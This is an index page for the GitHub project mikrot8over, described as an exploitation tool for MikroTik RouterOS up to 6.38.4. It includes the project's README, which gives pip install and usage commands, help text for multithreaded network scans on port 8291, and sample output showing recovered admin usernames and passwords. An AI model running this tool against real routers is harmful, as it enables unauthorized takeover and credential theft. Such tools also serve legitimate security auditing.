Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/vulnersCom/mikrot8over
mikrot8over: Fast exploitation tool for Mikrotik RouterOS up to 6.38.4
https://github.com/vulnersCom/mikrot8over
Last synced: 5 days ago
JSON representation
mikrot8over: Fast exploitation tool for Mikrotik RouterOS up to 6.38.4
- Host: GitHub
- URL: https://github.com/vulnersCom/mikrot8over
- Owner: vulnersCom
- License: mit
- Created: 2020-09-28T09:03:28.000Z (about 4 years ago)
- Default Branch: master
- Last Pushed: 2020-10-07T06:08:20.000Z (about 4 years ago)
- Last Synced: 2024-07-09T09:22:21.436Z (4 months ago)
- Language: Python
- Size: 6.84 KB
- Stars: 110
- Watchers: 10
- Forks: 40
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - vulnersCom/mikrot8over - mikrot8over: Fast exploitation tool for Mikrotik RouterOS up to 6.38.4 (Python)
README
# mikrot8over
mikrot8over: Fast exploitation tool for Mikrotik RouterOS up to 6.38.4[![Current Release](https://img.shields.io/github/release/vulnersCom/mikrot8over.svg "Current Release")](https://github.com/vulnersCom/mikrot8over/releases/latest)
# Description
This is reworked original [Mikrotik Exploit](https://github.com/miladdiaz/MikrotikExploit).
Added Python 2 compatibility and multithreading scan features.# Python version
Utility was tested on a *python2.6*, *python2.7*, *python3.**
If you have found any bugs, don't hesitate to open issue# How to install
`pip install mikrot8over`
# Scan and exploit
```
# pip install mikrot8over
# mikrot8over 127.0.0.1
Starting scan for IP 127.0.0.1, port 8291 running in 10 threads
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 3379.78it/s]
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+
| IP | Login | Password |
+======================+================================+======================================================================================================+
127.0.0.1 admin admin
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+
```# Performance tuning
You can set max threads and socket timeout for large networks scan
```
# pip install mikrot8over
# mikrot8over --help
Usage:
Mikrotik exploit from Vault 7 CIA Leaks automation tool
Takeovers up to RouterOS 6.38.4.Usage: mikrot8over IP_ADDRESS
Options:
-h, --help show this help message and exit
-p PORT, --port=PORT List of the port to scan. Default is 8291
-t THREADS, --threads=THREADS
Number of scan threads. Default is 10 that fits the
most of systems
-o TIMEOUT, --timeout=TIMEOUT
Socket connection timeout```